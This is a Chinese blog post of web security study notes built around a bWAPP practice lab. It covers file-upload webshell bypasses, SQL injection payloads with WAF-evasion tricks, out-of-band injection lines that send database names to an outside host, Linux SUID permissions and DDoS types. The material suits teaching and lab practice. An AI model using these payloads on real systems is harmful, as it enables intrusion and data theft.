<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>web安全学习笔记 | 小陈的个人博客</title><meta name=keywords content="web安全"><meta name=description content="常见web工具：
burpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应
curl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等
postmain
hackbar quantum
wappalyzer
文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等
文件上传漏洞关键点在于绕过
由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）
这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）
docker pull raesene/bwapp
docker run -d -p 0.0.0.0:80:80 raesene/bwapp
访问127.0.0.1/install.php
点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes
创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php
点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录
简单接触文件上传漏洞
chose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）
上传一句话木马，创建shell.php文件，添加
通过curl触发，执行curl -d &rsquo;test=echo getcwd();&rsquo; http://127.0.0.1/images/shell.php
可以看到成功触发shell.php，并且服务器返回了当前执行的目录
后缀名绕过
安全级别选择medium（set your security level）
常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）
这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块
.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时
上传.htaccess文件，内容为：AddType application/x-httpd-php jpg
上传木马，shell.jpg
AddType application/x-httpd-php jpg的意思是，jpg文件按照php文件的方式解析
大小写绕过
大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的
Windows文件流绕过
利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流
例如：
echo hallo,word > hallo.txt:a.txtecho hallo > hallo."><meta name=author content="Me"><link rel=canonical href=http://chenjunlinabc.github.io/posts/145/><meta name=google-site-verification content="XYZabc"><meta name=yandex-verification content="XYZabc"><meta name=msvalidate.01 content="XYZabc"><link crossorigin=anonymous href=/assets/css/stylesheet.bc1149f4a72aa4858d3a9f71462f75e5884ffe8073ea9d6d5761d5663d651e20.css integrity="sha256-vBFJ9KcqpIWNOp9xRi915YhP/oBz6p1tV2HVZj1lHiA=" rel="preload stylesheet" as=style><script defer crossorigin=anonymous src=/assets/js/highlight.f413e19d0714851f6474e7ee9632408e58ac146fbdbe62747134bea2fa3415e0.js integrity="sha256-9BPhnQcUhR9kdOfuljJAjlisFG+9vmJ0cTS+ovo0FeA=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=http://chenjunlinabc.github.io/favicon.ico><link rel=icon type=image/png sizes=16x16 href=http://chenjunlinabc.github.io/favicon.ico><link rel=icon type=image/png sizes=32x32 href=http://chenjunlinabc.github.io/favicon.ico><link rel=apple-touch-icon href=http://chenjunlinabc.github.io/favicon.ico><link rel=mask-icon href=http://chenjunlinabc.github.io/favicon.ico><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><noscript><style>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:rgb(29, 30, 32);--entry:rgb(46, 46, 51);--primary:rgb(218, 218, 219);--secondary:rgb(155, 156, 157);--tertiary:rgb(65, 66, 68);--content:rgb(196, 196, 197);--hljs-bg:rgb(46, 46, 51);--code-bg:rgb(55, 56, 62);--border:rgb(51, 51, 51)}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(e,t,n,s,o,i,a){e.GoogleAnalyticsObject=o,e[o]=e[o]||function(){(e[o].q=e[o].q||[]).push(arguments)},e[o].l=1*new Date,i=t.createElement(n),a=t.getElementsByTagName(n)[0],i.async=1,i.src=s,a.parentNode.insertBefore(i,a)}(window,document,"script","https://www.google-analytics.com/analytics.js","ga"),ga("create","UA-123-45","auto"),ga("send","pageview"))</script><meta property="og:title" content="web安全学习笔记"><meta property="og:description" content="常见web工具：
burpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应
curl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等
postmain
hackbar quantum
wappalyzer
文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等
文件上传漏洞关键点在于绕过
由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）
这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）
docker pull raesene/bwapp
docker run -d -p 0.0.0.0:80:80 raesene/bwapp
访问127.0.0.1/install.php
点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes
创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php
点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录
简单接触文件上传漏洞
chose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）
上传一句话木马，创建shell.php文件，添加
通过curl触发，执行curl -d &rsquo;test=echo getcwd();&rsquo; http://127.0.0.1/images/shell.php
可以看到成功触发shell.php，并且服务器返回了当前执行的目录
后缀名绕过
安全级别选择medium（set your security level）
常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）
这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块
.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时
上传.htaccess文件，内容为：AddType application/x-httpd-php jpg
上传木马，shell.jpg
AddType application/x-httpd-php jpg的意思是，jpg文件按照php文件的方式解析
大小写绕过
大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的
Windows文件流绕过
利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流
例如：
echo hallo,word > hallo.txt:a.txtecho hallo > hallo."><meta property="og:type" content="article"><meta property="og:url" content="http://chenjunlinabc.github.io/posts/145/"><meta property="og:image" content="http://chenjunlinabc.github.io/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-04-13T13:50:00+00:00"><meta property="article:modified_time" content="2022-04-13T13:50:00+00:00"><meta property="og:site_name" content="ExampleSite"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="http://chenjunlinabc.github.io/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta name=twitter:title content="web安全学习笔记"><meta name=twitter:description content="常见web工具：
burpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应
curl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等
postmain
hackbar quantum
wappalyzer
文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等
文件上传漏洞关键点在于绕过
由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）
这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）
docker pull raesene/bwapp
docker run -d -p 0.0.0.0:80:80 raesene/bwapp
访问127.0.0.1/install.php
点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes
创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php
点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录
简单接触文件上传漏洞
chose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）
上传一句话木马，创建shell.php文件，添加
通过curl触发，执行curl -d &rsquo;test=echo getcwd();&rsquo; http://127.0.0.1/images/shell.php
可以看到成功触发shell.php，并且服务器返回了当前执行的目录
后缀名绕过
安全级别选择medium（set your security level）
常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）
这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块
.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时
上传.htaccess文件，内容为：AddType application/x-httpd-php jpg
上传木马，shell.jpg
AddType application/x-httpd-php jpg的意思是，jpg文件按照php文件的方式解析
大小写绕过
大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的
Windows文件流绕过
利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流
例如：
echo hallo,word > hallo.txt:a.txtecho hallo > hallo."><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"http://chenjunlinabc.github.io/posts/"},{"@type":"ListItem","position":2,"name":"web安全学习笔记","item":"http://chenjunlinabc.github.io/posts/145/"}]}</script><script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"web安全学习笔记","name":"web安全学习笔记","description":"常见web工具：\nburpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应\ncurl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等\npostmain\nhackbar quantum\nwappalyzer\n文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等\n文件上传漏洞关键点在于绕过\n由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）\n这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）\ndocker pull raesene/bwapp\ndocker run -d -p 0.0.0.0:80:80 raesene/bwapp\n访问127.0.0.1/install.php\n点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes\n创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php\n点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录\n简单接触文件上传漏洞\nchose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）\n上传一句话木马，创建shell.php文件，添加\n通过curl触发，执行curl -d \u0026rsquo;test=echo getcwd();\u0026rsquo; http://127.0.0.1/images/shell.php\n可以看到成功触发shell.php，并且服务器返回了当前执行的目录\n后缀名绕过\n安全级别选择medium（set your security level）\n常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）\n这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块\n.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时\n上传.htaccess文件，内容为：AddType application/x-httpd-php jpg\n上传木马，shell.jpg\nAddType application/x-httpd-php jpg的意思是，jpg文件按照php文件的方式解析\n大小写绕过\n大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的\nWindows文件流绕过\n利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流\n例如：\necho hallo,word \u0026gt; hallo.txt:a.txt\recho hallo \u0026gt; hallo.","keywords":["web安全"],"articleBody":"常见web工具：\nburpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应\ncurl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等\npostmain\nhackbar quantum\nwappalyzer\n文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等\n文件上传漏洞关键点在于绕过\n由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）\n这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）\ndocker pull raesene/bwapp\ndocker run -d -p 0.0.0.0:80:80 raesene/bwapp\n访问127.0.0.1/install.php\n点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes\n创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php\n点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录\n简单接触文件上传漏洞\nchose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）\n上传一句话木马，创建shell.php文件，添加\n通过curl触发，执行curl -d ’test=echo getcwd();’ http://127.0.0.1/images/shell.php\n可以看到成功触发shell.php，并且服务器返回了当前执行的目录\n后缀名绕过\n安全级别选择medium（set your security level）\n常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）\n这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块\n.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时\n上传.htaccess文件，内容为：AddType application/x-httpd-php jpg\n上传木马，shell.jpg\nAddType application/x-httpd-php jpg的意思是，jpg文件按照php文件的方式解析\n大小写绕过\n大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的\nWindows文件流绕过\n利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流\n例如：\necho hallo,word \u003e hallo.txt:a.txt\recho hallo \u003e hallo.txt\recho 666 \u003e hallo.txt::$data\r第一个例子中，hallo,word并没有写入到hallo.txt，而是写入到了hallo.txt下的a.txt文件流中\n第三个例子中，666写入到了hallo.txt默认文件流中\n针对于白名单进行绕过\n截断绕过（环境要求：php\u003e5.3.42，magic_quotes_gpc关闭）\n搭配burpsuite来拦截http请求\n上传shell.php，通过拦截修改请求报文，修改为shell.php$00.jpg\n$00在url中会解析为0，而在ASCII中0又表示为字符串结束，因此当url出现$00时，表示字符串读取结束\n因此在上传shell.php$00.jpg时，对于先上传后检测的服务端来说，实质上传的是shell.php\nSQL注入\nSQL注入漏洞是用户应用层与数据库层的安全漏洞\n发生SQL注入的原因就是用户应用层提供的数据存在恶意SQL语句，当这些恶意SQL语句不被审查就执行的话是非常危险的，例如在一些输入框（比如搜索框）中提交一些恶意SQL语句，因为后端需要根据用户提供的数据来动态的构造SQL查询语句，而且这些动态参数存在恶意SQL语句时又没有进行过滤审查，将导致SQL注入漏洞触发\n过程：通过数据库管理系统执行SQL命令，并且将数据库管理系统的执行结果返回给web服务器，web服务器再将结果进行整合成html网页，最后发送给客户端\nGET型SQL注入漏洞是指使用GET请求方法进行URL链接拼接，来获取到超越权限的数据\nGET型SQL注入漏洞\n方法1：利用UNION操作符，并且通过SELECT 1,2,3,4,5来查找可以显示多少字段数据\nUNION SELECT 1,user(),database(),table_name,version() FROM INFORMATION_SCHEMA.tables WHERE table_schema=database() –\n查找INFORMATION_SCHEMA数据库的tables表的使用了当前数据库用户名，当前数据库名称，当前数据库版本，以及当前数据库的数据表，后面的–是sql注释，也可以使用#来注释掉后面的sql命令\n当查找到的数据表存在敏感名称时，例如user时，可对敏感名称的表进行查找\nUNION SELECT 1,columns,3,4,5 FROM INFORMATION_SCHEMA.columns WHERE table_name=‘user’ –\n通过上面的命令查找user表的字段，当出现password，login等字段时，可以确定为后台的登录密码以及用户\nUNION SELECT 1,password,login,4,5 FROM user –\n通过上面的命令查找user表的password和login字段\n注意：一般来说password字段返回的数据都是加密过的，而且绝大多加密算法都是不可逆的，只能通过彩虹表来碰撞\nPOST型SQL注入漏洞（主要通过http请求工具，因为post请求不是通过url发送的，http请求工具例如postman或者burpsuite，触发的方法和get型类似）\n判断SQL注入点\n能够与数据库进行交互，并且可以提交参数到网页时，那么可能存在sql注入\n单引号判断法\nhttps://webtest.cjlio.com?id=1'\n如果页面报错则存在SQL注入，因为sql会因为单引号个数不成对而导致sql执行错误而报错\n判断注入的参数类型（如果参数可以输入非整型，则直接使用字符串型）\n整型\nSELECT * FROM test where id = and 1=1\n字符串型\nSELECT * FROM test where id = ‘1’ and ‘1’=‘1’\n百分号判断法\n针对于使用了LIKE关键字的\nhttps://webtest.cjlio.com?id=1$' and ‘1’=‘1’ –\n简单的SQL注入防御方法：\n减低错误信息的提供\n使用mysql_escape_string($id)转义，将’转义\n过滤and，or，union，select等等关键词（黑名单）\nSQL注入漏洞主要的类型：布尔型注入，可联合查询注入，基于时间延迟注入，报错型注入，可多语句查询注入\n布尔型注入\nhttps://webtest.cjlio.com/?id=1' and substring(version) = 5–\n布尔型注入被用于盲注，上面的例子中是通过布尔型注入来判断一下数据库版本是否为5，如果是的，那么将会是正常请求\n联合查询注入（使用UNION关键字来拼接自己想要执行的SQL语句）\n基于时间延迟注入（通过判断请求响应的时间来得到想要的信息，盲注，当页面不会提供报错信息时，布尔型注入也无效时采用）\nhttps://webtest.cjlio.com/?id=1' and slepp(5)–\nslepp函数的作用是当sql语句执行完成后等待指定秒数再去返回执行结果，通过感觉时间来确定该语句是否正常执行\n报错型注入（如果页面可以返回sql报错信息时使用，通过报错信息中获取数据）\n多语句查询型注入（当页面可以执行多条SQL语句时）\n例如：https://webtest.cjlio.com/?id=1; SELECT * FROM test where id =1–\n多语句查询型注入可以使用时，很大可能UPDATA数据库更新或者删除数据库可以触发\nHTTP头注入\n利用http请求头，当web服务器需要从http请求头中获取信息到数据库中时（针对不进行过滤审查就直接进行数据库操作时）\n通过http请求工具，例如postman或者burpsuite，修改请求头，重放攻击\nUser-Agent: abc’, (SELECT database()) –\n堆叠注入（多条sql命令一起执行）\n使用;结束当前sql命令后继续执行下一条sql命令\n联合注入和堆叠注入区别：联合注入只能进行查询操作（取决于sql命令的拼接头是查询还是更新还是删除，或者插入），而堆叠注入可以执行任意sql命令\n一般实质环境中堆叠注入用不到（可以会出现权限问题），但是一用到就威力无穷\nOOB注入（out of band，带外通道技术）\n通过生成请求体来攻击，目标服务器接收到恶意的请求体后，进一步处理，处理的过程中目标服务器可能要向外部发送请求或者向外部获取资源，而这个外部实质是攻击者控制的服务器，在进行外部的请求时，将数据一起发送给攻击者控制的服务器，最后在攻击者控制的服务器查看数据（例如：通过dns记录来显示）\nhttps://test1.cjlio.com/?id=1' and SELECT CONCAT(’\\\\’,(SELECT database(),’.test2.cjlio.com’);\nhttps://test1.cjlio.com/?id=1' and SELECT LOAD_FILE(CONCAT(’\\\\’,(SELECT database(),’.test2.cjlio.com’));\n最后在DNS记录中查看到想要的数据，上面的例子是获取当前的数据库名\n利用HTTP协议来OOB注入\nhttps://test1.cjlio.com/?id=1' and SELECT UTL_HTTP.REQUEST(https://test2.cjlio.com/test.php ‘||’?id=’||(SELECT database())) FROM dual;\n上面的例子是通过https://test2.cjlio.com的test.php记录传递的数据，并且写入到test.txt中\n混淆和绕过\n一般的注入攻击会被WAF检测和过滤掉，而混淆和绕过就是针对WAF防御的手段\n过滤词绕过\nOR可使用||绕过，AND可使用\u0026\u0026绕过\nunion被过滤可使用||来绕过，例如：https://test1.cjlio.com/?id=1’ ||(SELECT user FROM usermain limit 1,1) = ‘root’\nlimit被过滤，可通过GROUP BY语句创建一个虚拟表，来绕过，例如：https://test1.cjlio.com/?id=1’ || SELECT min(user),id FROM usermain GROUP BY user HAVING user=‘root’\nGROUP BY被过滤，可通过SUBSTR()函数和GROUP_CONCAT()函数绕过，例如：https://test1.cjlio.com/?id=1’ || SELECT SUBSTR((SELECT GROUP_CONCAT(user)user FROM usermain),1,1)\nSELECT和引号被过滤，可通过SUBSTR()函数绕过，例如：https://test1.cjlio.com/?id=1’ || SUBSTR(user,1,1=0x72)\n空格被过滤，可通过/**/来替代空格来分开sql语句\n等号被过滤，可通过like关键字绕过\n双写绕过：例如union被过滤，可使用ununionion来替代，当ununionion被union被过滤机制处理后，将中间的union替代为空，导致左右两边合在了一起，从而达到绕过的目的、\n双重编码绕过：当某个url编码的参数会被WAF编码过滤时，可对参数进行二次编码，让WAF解第一层编码，但是还有第二层编码，从而达到绕过的目的\n编码注入（url编码）：%27表示’，%23表示#，%df表示无意义，%5c表示\\，%3d表示=，%2A表示*，例如：https://test1.cjlio.com/?id=1 %df SELECT %2A FROM test where id %3d 1 %23\n二次注入：数据库存储的数据并不安全，不应该直接调用数据库的数据，例如admin’#\n提权\nLinux的特殊权限\nSUID（Set UID）：除了rwx权限外的s权限，当某个普通用户具备运行具备SUID权限的文件时，那么当运行该文件，将会使用该文件所有者的身份去执行该文件，只要执行一结束，该身份将会消失\n例如passwd命令，该命令具备SUID权限，当执行该命令时，将表示使用root身份来执行passwd命令，从而修改/usr/bin/passwd这个密码记录文件（该文件普通用户没有任何权限，当然权限只能限制普通用户，root用户是不会被限制的）\n注意：SUID的特性，必须具备可执行权限，而且只对可执行文件有效，目录以及不可执行文件无效，提升权限的效果只在文件执行过程有效，执行结束则身份恢复，s权限必须在所有者权限上（也就是-rws–x–x）\nSGID（Set GID）：当s权限出现在所属组中将变成SGID权限，如：-rwx–s–x，同样SGID只对可执行文件有效，而且其他用户具备可执行文件，一样只在执行过程中有效\n该特殊权限的特性：在执行该具备SGID特殊权限的可执行文件时，当前用户的组身份将变成文件所属组的身份，赋予的是所属组的权限\n注意：SGID对目录也是具备效果的，只不过当目录被赋予SGID权限后，不是执行触发，而且进入该目录就会触发特性，但是前提是该目录对于普通用户具备rwx权限，这样才能发挥SGID在目录的全部功能\nSBIT（Stick BIT）：t权限，该特殊权限只对目录有效，当目录具备了SBIT特殊权限后，那么不管用户在该目录下创建的文件还是目录，都是只有该用户和root用户有权限修改和删除\n该权限的表示为：drwxrwxrwt，哪怕其他用户具备该目录的全部权限\nDDOS攻击（分布式拒绝服务攻击）\n原理：利用TCP/IP协议族的漏洞，来对目标服务器发送数据流，当超过服务器的处理能力或者服务器的带宽被饱和了，将导致服务器崩溃或者服务器网络崩溃，常见的DDOS攻击有：UDP泛洪攻击，DNS放大攻击，ICMP泛洪攻击，内存缓存放大攻击，SYN泛洪攻击，PING泛洪攻击，NTP放大攻击，ACK泛洪攻击，HTTP泛洪攻击（也就是CC攻击），Slowloris攻击，HTTP Post DDOS攻击等等\nUDP泛洪攻击：利用UDP不需要建立连接就可以发送数据包的特性，大量发送UDP数据包给目标服务器的随机端口，当服务器接收到UDP数据包时，如果该端口没有应用在监听接收数据，会给发送方发送一个数据包，来表示目标端口不可用，当量大到一定程度时，服务器将无法对合法数据进行反应，从而达到拒绝服务的目的，对于会给发送方发送数据包，可进行伪造IP地址，不但不会作用到攻击机上，还做到了匿名\nDNS放大攻击：利用DNS服务器，对DNS服务器发送DNS请求响应，但是该请求包被伪造成了目标服务器的IP，DNS服务器将会向目标服务器发送大量的数据包，从而造成网络阻塞，来达到拒绝服务的目的\nICMP泛洪攻击：通过不断发送ICMP ECHO REQUEST来对消耗目标服务器的处理器资源和带宽\n攻击者控制的僵尸机对目标服务器发送ICMP ECHO REQUEST，目标服务器需要返回ICMP ECHO REPLY，常见的攻击手法有ping\n内存缓存放大攻击：利用UDP的特性（不需要连接），当使用伪造IP对目标服务器发送http请求，目标服务器接收到请求后，发送响应到伪造的IP上，当目标服务器无法处理庞大的请求响应时，将会导致服务器崩溃和带宽饱满\n放大攻击就是利用了请求包和响应包的体积差，发送小的请求包，需要返回大的响应包，从而达到放大攻击的效果\nSYN泛洪攻击和ACK泛洪攻击都是利用TCP的三次握手的特性\nSYN泛洪攻击：伪造IP向目标服务器发送SYN包，目标服务器接收到后返回ACK给伪造IP的机子，但是接收ACK的目标是不存在的，如果不对其进行确认ACK的话，目标服务器将该次连接挂起（半连接状态），目标服务器会重复发送ACK给伪造的IP上，当量大时，挂起的连接将会消耗掉目标服务器的资源，导致其崩溃，从而达到拒绝服务攻击的目的\nACK泛洪攻击：向目标服务器发送大量的ACK数据包，实质理论和SYN泛洪攻击类似\nHTTP泛洪攻击：发送正常的请求，目标服务器需要返回响应，但是这个正常的请求是有针对性的，针对服务器需要消耗大量资源来做出响应的请求，例如搜索请求\nSlowloris攻击：利用HTTP Request的特性，通过\\r\\n\\r\\n来表示HTTP请求发送已完成，当\\r\\n\\r\\n永远不发送时，目标服务器将会保持TCP连接，并且以一种极低速度来发送数据给目标服务器，让目标服务器认为HTTP Request还没有接收完成从而保持TCP连接，当量大时，目标服务器将被占满TCP连接，从而接收不到新的请求，最后达到拒绝服务攻击的目的\n防御Slowloris攻击很简单，限制HTTP Request传输的最大时间，超时将中断连接，并且拉入黑名单\nHTTP Post DDOS攻击：和Slowloris攻击类似，一样是慢速攻击，不过是通过指定一个大的content-length，但是发送包的速度很慢，来达到保持连接，消耗目标服务器的资源\n","wordCount":"313","inLanguage":"en","datePublished":"2022-04-13T13:50:00Z","dateModified":"2022-04-13T13:50:00Z","author":{"@type":"Person","name":"Me"},"mainEntityOfPage":{"@type":"WebPage","@id":"http://chenjunlinabc.github.io/posts/145/"},"publisher":{"@type":"Organization","name":"小陈的个人博客","logo":{"@type":"ImageObject","url":"http://chenjunlinabc.github.io/favicon.ico"}}}</script></head><body id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add("dark"):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove("dark"):window.matchMedia("(prefers-color-scheme: dark)").matches&&document.body.classList.add("dark")</script><header class=header><nav class=nav><div class=logo><a href=http://chenjunlinabc.github.io/ accesskey=h title="小陈的个人博客 (Alt + H)"><img src=http://chenjunlinabc.github.io/favicon.ico alt aria-label=logo height=35>小陈的个人博客</a><div class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></div></div><ul id=menu><li><a href=http://chenjunlinabc.github.io/ title=首页><span>首页</span></a></li><li><a href=http://chenjunlinabc.github.io/categories/ title=分类><span>分类</span></a></li><li><a href=http://chenjunlinabc.github.io/archives/ title=归档><span>归档</span></a></li><li><a href=http://chenjunlinabc.github.io/tags/ title=标签><span>标签</span></a></li><li><a href=http://chenjunlinabc.github.io/links/ title=链接><span>链接</span></a></li><li><a href=http://chenjunlinabc.github.io/about/ title=关于><span>关于</span></a></li><li><a href=http://chenjunlinabc.github.io/search/ title="搜索 (Alt + /)" accesskey=/><span>搜索</span></a></li></ul></nav></header><main class=main><article class=post-single><header class=post-header><div class=breadcrumbs><a href=http://chenjunlinabc.github.io/>Home</a>&nbsp;»&nbsp;<a href=http://chenjunlinabc.github.io/posts/>Posts</a></div><h1 class=post-title>web安全学习笔记</h1><div class=post-meta><span title='2022-04-13 13:50:00 +0000 UTC'>2022-04-13</span>&nbsp;·&nbsp;2 min&nbsp;·&nbsp;Me&nbsp;|&nbsp;<a href=https://blog.cjlio.com/posts/web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%94%e8%ae%b0.md rel="noopener noreferrer" target=_blank>Suggest Changes</a></div></header><div class=post-content><p>常见web工具：</p><p>burpsuite：通过代理渗透，可重放HTTP请求，来分析HTTP响应</p><p>curl：通过url方式传输数据，可用于抓取页面（执行请求），监控网络等等</p><p>postmain</p><p>hackbar quantum</p><p>wappalyzer</p><p>文件上传漏洞：没有足够的安全约束的情况下，允许上传恶意文件，例如恶意脚本，webshell等等</p><p>文件上传漏洞关键点在于绕过</p><p>由于法律限制的原因，禁止对其他网站非法攻击，因此需要在本地或者在自己的服务器上建立靶场渗透环境，这边使用的是bwapp（全称为buggy web Application）</p><p>这边使用的是docker运行bwapp，也可以下载bwapp，来自己搭建（https://sourceforge.net/projects/bwapp/files/）</p><p>docker pull raesene/bwapp</p><p>docker run -d -p 0.0.0.0:80:80 raesene/bwapp</p><p>访问127.0.0.1/install.php</p><p>点击here来初始化，或者直接访问127.0.0.1/install.php?install=yes</p><p>创建账号信息，点击new user，或者直接访问127.0.0.1/user_new.php</p><p>点击login，或者直接访问127.0.0.1/login.php，根据刚才的账号信息进行登录</p><p>简单接触文件上传漏洞</p><p>chose your bug选择unrestricted File Upload（未经严格审记的文件上传），安全级别选择low（set your security level）</p><p>上传一句话木马，创建shell.php文件，添加</p><p>通过curl触发，执行curl -d &rsquo;test=echo getcwd();&rsquo; http://127.0.0.1/images/shell.php</p><p>可以看到成功触发shell.php，并且服务器返回了当前执行的目录</p><p>后缀名绕过</p><p>安全级别选择medium（set your security level）</p><p>常见后缀名验证方式有，黑名单（禁止哪些后缀上传），白名单（只允许哪些后缀上传）</p><p>这里的靶场环境的web server为Apache，因此需要了解Apache解析器模块</p><p>.htaccess绕过，当黑名单没有限制上传.htaccess文件时，并且web sever也支持.htaccess时</p><p>上传.htaccess文件，内容为：AddType application/x-httpd-php jpg</p><p>上传木马，shell.jpg</p><p>AddType application/x-httpd-php 